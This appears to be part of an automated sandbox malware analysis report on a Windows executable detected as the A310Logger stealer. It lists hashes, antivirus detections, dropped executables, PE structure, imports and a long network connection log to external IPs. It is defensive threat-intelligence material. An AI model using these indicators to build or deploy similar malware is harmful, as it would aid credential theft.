                                                                                  SHA-256:8A1902D9C0DBE388B28EF5A9C8EC4C0F1802FC6CCD43471EA337DCB3D71C81D4
                                                                                  SHA-512:AD84D419D61B63E36A6766BA90773B39270BF9C8E72373B52C1979097E73110F749FAD0CFED5C4F233304AD0AF4B6E753666911FF7DB83475C16C38976C46382
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , Author: ditekSHen
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: m7iukFCY93.exe, Detection: malicious, Browse
                                                                                  • Filename: Bc90WRHFvI.exe, Detection: malicious, Browse
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):8192
                                                                                  Entropy (8bit):2.7288702499822977
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:11znr522cab7kUTFb7kEKb7kl7b7kwb7kbIl9lKb7k0tpl+b7k3/Rb7kUb7kwtbH:71200UTF0R0p0w0U9M0Cl+0350U0i09O
                                                                                  MD5:CEAD2041C8D4962195D07618A29DC8CB
                                                                                  SHA1:9F8846FC929472F0F34EB86566C63E0BB0024744
                                                                                  SHA-256:49CE3E0B0082B180DAE60FC7F4EBF01359D027E1BF93FC51C6AAB2F38343F579
                                                                                  SHA-512:03673ACA340C5B4FE28F74E87E130AF1BC76B66466D1D507C594A3C41CF152E64CAA78018F97596AF2D980299F39D60BFE3ED8A7A7EAAD81B756FCE385425C61
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):55
                                                                                  Entropy (8bit):4.306461250274409
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                  Malicious:false
                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                  Category:dropped
                                                                                  Size (bytes):56286
                                                                                  Entropy (8bit):5.402091021498643
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:PyMapcrHsCNwn1d0kelTaGNpSz17sjQRrCjmZIclnlZ+/s:Pq8wnSxdqIclnlZCs
                                                                                  MD5:276F671F15DAEEA9B0A348C035211481
                                                                                  SHA1:0B33726249C5FFEC7A23F44506F533879F46B5AE
                                                                                  SHA-256:380DB9B45C38368CE654C7976EBADA338C026047B020D4924D29B73978399ECE
                                                                                  SHA-512:2502DB102655C3E43A0DD569D2214618676039C3F0BCA37DD9175C2A1B693B76734EDA2E4B51EBE37473B00AF931BB9FFF4DCD9C665485273FBA2CA186102060
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>.<html lang="en-US" class="s-dark site-s-dark">..<head>...<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />... This site is optimized with the Yoast SEO Premium plugin v18.0 (Yoast SEO v18.4.1) - https://yoast.com/wordpress/plugins/seo/ -->..<title>What happened to the old ZXQ website? | ZXQ</title><link rel="preload" as="font" href="https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2" type="font/woff2" crossorigin="anonymous" />..<link rel="canonical" href="https://zxq.net/what-happened-to-the-old-zxq-website/" />..<meta property="og:locale" content="en_US" />..<meta property="og:type" content="article" />..<meta property="og:title" content="What happened to the old ZXQ website?" />..<meta property="og:description" content="Information For ZXQ.net Subdomain Owners The old ZXQ website
                                                                                  Process:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):281083
                                                                                  Entropy (8bit):5.202661139115795
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unL:UvEN2U+T6i5LirrllHy4HUcMQY6c
                                                                                  MD5:A6F18E47BFFD6F5C4AA28B67644DBDBE
                                                                                  SHA1:DCDD1C1A4AE4B4895C6178B74F6E2EE9E65E5E4A
                                                                                  SHA-256:68322016C65440FC7D65639B5FFFDA0FCB88A48C71A7EBFB97538CEEFF01E169
                                                                                  SHA-512:13708F55B9CDC2C543A0E30390A5DCC5FEF84FE6C9AB2F91C051072A4CD6A52C6DB46959FD426338575D2E86D023FA3539783CC7ED08E013639A47ECF9C7755A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):281050
                                                                                  Entropy (8bit):5.203679658631862
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unp:UvEN2U+T6i5LirrllHy4HUcMQY6A
                                                                                  MD5:3BA9E53239D4DCA948B4BFCBB08D7F34
                                                                                  SHA1:DCAEACF865EEC33FC25F070BD14E625DB62EAEEA
                                                                                  SHA-256:DE744B26539460F87FDE59A46F8B02B804B48B09F8858C6E47D5A91884BDB815
                                                                                  SHA-512:253A7D9149D3BF78B3CF1388F8F938F9CA88BF32BBCFA839B69AA291AE3EE8012A18B3BD8D9C46C9E15F7112FD08F8B8DFA9231A7D54F4C6BB38D9BAC3F3CD77
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Process:C:\Windows\System\spoolsv.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):281069
                                                                                  Entropy (8bit):5.1944174556657225
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6uns:UvEN2U+T6i5LirrllHy4HUcMQY6/
                                                                                  MD5:B61A3DA9B4DB4644497B9CC1BE87515F
                                                                                  SHA1:AB2D7BCD8ED29C7CB153C773E51E67183DDAE86F
                                                                                  SHA-256:0BB1AB1BD7CE02E6CBAD5A5090E784EA8C99A0EDCDDFF9798CF6ADCFB473E966
                                                                                  SHA-512:46001689BBA5AEFF7D05B51400FFF8E4B833A65DAF26D2AC2C66B3535CBE17F92F3A2415F3A6C65404032507C66B6658C8EF8D83A24DCA9C53666C5ABD6A160D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):5.4282107837365885
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Lg3gn9y1Cj.exe
                                                                                  File size:416083
                                                                                  MD5:45061e4da841c2587d0890148705a142
                                                                                  SHA1:eb68218c1d70f3ba00f8190c8171ad1cfa2fb42a
                                                                                  SHA256:6731f235ff78e22e5a0f1503542926bb707a95251b8cbd22c56fbd7fc5a8cbbf
                                                                                  SHA512:01a561bbb8418364078e4751e69a5d61075220cfbaa7582a0b664ccc1fd45b6dd1accc4ef3dd2b2e6b0dc1a99d9e5f5605ee453eb6c1010c28a189109a51c294
                                                                                  SSDEEP:6144:UvEN2U+T6i5LirrllHy4HUcMQY61DdreIfa:GENN+T5xYrllrU7QY61ra
                                                                                  TLSH:A3946D6AFB64321AF577D6F0692792697B397D321F629C5F92C06B082474213B2B031F
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@................
                                                                                  Icon Hash:20047c7c70f0e004
                                                                                  Entrypoint:0x403670
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:
                                                                                  Time Stamp:0x4DF7AFFC [Tue Jun 14 19:01:16 2011 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:98f67c550a7da65513e63ffd998f6b2e
                                                                                  Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2ac84 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e000 | 0x5e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x250 | 0x20 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x284 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2a728 | 0x2b000 | False | 0.3680675417877907 | data | 5.947197438251493 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x2c000 | 0x1b74 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e000 | 0x5e0 | 0x1000 | False | 0.118408203125 | data | 1.6929355482699409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tdata | 0x2f000 | 0xf000 | 0xf000 | False | 0.0013346354166666667 | data | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2e2f8 | 0xcd0 | dBase IV DBT of @.DBF, block length 3072, next free block index 40, next free block 0, next used block 0 | |
RT_GROUP_ICON | 0x2e2e4 | 0x14 | data | |
RT_VERSION | 0x2e0f0 | 0x1f4 | data | English | United States
DLL | Import
MSVBVM60.DLL | EVENT_SINK_GetIDsOfNames, __vbaStrI2, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarVargNofree, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaLateIdCall, __vbaPut3, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, __vbaPut4, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaNameFile, _adj_fdiv_m32, __vbaAryVar, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaBoolStr, __vbaExitProc, __vbaI4Abs, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaStrFixstr, _CIsin, __vbaErase, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaPutOwner3, __vbaVarTstEq, __vbaAryConstruct2, __vbaObjVar, __vbaI2I4, DllFunctionCall, __vbaVarLateMemSt, __vbaFpUI1, __vbaRedimPreserve, __vbaStrR4, _adj_fpatan, __vbaFixstrConstruct, __vbaLateIdCallLd, Zombie_GetTypeInfoCount, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaGetOwner3, __vbaUbound, __vbaFileSeek, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaVarLateMemCallLdRf, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarSetVar, __vbaI4Var, __vbaLateMemCall, __vbaVarAdd, __vbaAryLock, __vbaStrComp, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, __vbaVarLateMemCallLd, __vbaVarSetObjAddref, __vbaRecDestructAnsi, __vbaLateMemCallLd, _CIatan, __vbaAryCopy, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, _allmul, __vbaVarLateMemCallSt, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Aug 5, 2022 09:09:39.643240929 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.254115105 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.254175901 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.254524946 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.254524946 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.254617929 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.295370102 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.419905901 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.419989109 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.420087099 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.420110941 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.445852041 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.445909977 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.445931911 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.446058035 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.690129042 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.690174103 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.690273046 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.690960884 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.690982103 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.032985926 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.035249949 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.329643011 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.329710960 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.344166994 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.344188929 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.513824940 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.515475035 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.515496016 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.515610933 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.682277918 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682301044 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682358027 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682413101 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.682430983 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682444096 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682466984 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.682549000 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.850943089 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.850991964 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.851121902 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.851243019 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.851258993 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.851303101 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.851325035 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.851340055 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.851388931 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.851392031 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.851443052 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.915364981 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.915400028 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:49.838565111 CEST4977580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:49.865452051 CEST8049775142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:49.866384983 CEST4977580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:49.868995905 CEST4977580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:49.895742893 CEST8049775142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:49.895886898 CEST8049775142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:49.895904064 CEST8049775142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:49.895975113 CEST4977580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:49.896433115 CEST4977580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:49.896465063 CEST4977580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:49.923171997 CEST8049775142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:49.923279047 CEST4977580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:51.655601025 CEST4978080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:51.682821035 CEST8049780142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:51.683022976 CEST4978080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:51.685256004 CEST4978080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:51.712429047 CEST8049780142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:51.712455034 CEST8049780142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:51.712469101 CEST8049780142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:51.712620020 CEST4978080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:51.713002920 CEST4978080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:51.713037968 CEST4978080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:53.595381021 CEST4978180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:53.622766018 CEST8049781142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:53.622886896 CEST4978180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:54.072979927 CEST4978180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:54.100260019 CEST8049781142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:54.100311995 CEST8049781142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:54.100342035 CEST8049781142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:54.100534916 CEST4978180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:54.143445969 CEST4978180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:54.143492937 CEST4978180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:58.454772949 CEST4976480192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:58.622678995 CEST804976451.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:58.622881889 CEST4976480192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:58.829507113 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:58.829561949 CEST4434978251.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:58.829677105 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:58.833066940 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:58.833091021 CEST4434978251.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:59.172475100 CEST4434978251.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:59.172730923 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:59.177917957 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:59.177938938 CEST4434978251.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:59.185406923 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:59.185451984 CEST4434978251.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:59.549030066 CEST4434978251.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:59.549107075 CEST4434978251.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:59.549144983 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:59.549185991 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:59.550719023 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:59.550738096 CEST4434978251.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:59.550786972 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:59.550812006 CEST49782443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:06.871422052 CEST4978380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:06.899652004 CEST8049783142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:06.899785042 CEST4978380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:06.900579929 CEST4978380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:06.928654909 CEST8049783142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:06.928702116 CEST8049783142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:06.928729057 CEST8049783142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:06.928809881 CEST4978380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:06.928853989 CEST4978380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:06.937242985 CEST4978380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:06.937297106 CEST4978380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:10.212275982 CEST4978480192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:10.240993023 CEST8049784142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:10.241110086 CEST4978480192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:10.252279043 CEST4978480192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:10.279514074 CEST8049784142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:10.279551029 CEST8049784142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:10.279645920 CEST8049784142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:10.279751062 CEST4978480192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:10.279854059 CEST4978480192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:10.284965992 CEST4978480192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:10.285005093 CEST4978480192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:10.312011957 CEST8049784142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:10.312159061 CEST4978480192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:12.702889919 CEST4978580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:12.730566025 CEST8049785142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:12.730767965 CEST4978580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:12.731399059 CEST4978580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:12.758933067 CEST8049785142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:12.758972883 CEST8049785142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:12.758996010 CEST8049785142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:12.759052038 CEST4978580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:12.759095907 CEST4978580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:12.765254021 CEST4978580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:12.765350103 CEST4978580192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:17.062716007 CEST4976480192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:17.228876114 CEST804976451.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:10:17.229001999 CEST4976480192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:17.802995920 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:17.803047895 CEST4434978951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:10:17.803157091 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:17.803772926 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:17.803798914 CEST4434978951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:10:18.160130024 CEST4434978951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:10:18.160216093 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:18.163636923 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:18.163651943 CEST4434978951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:10:18.174002886 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:18.174025059 CEST4434978951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:10:18.536457062 CEST4434978951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:10:18.536600113 CEST4434978951.81.194.202192.168.2.4
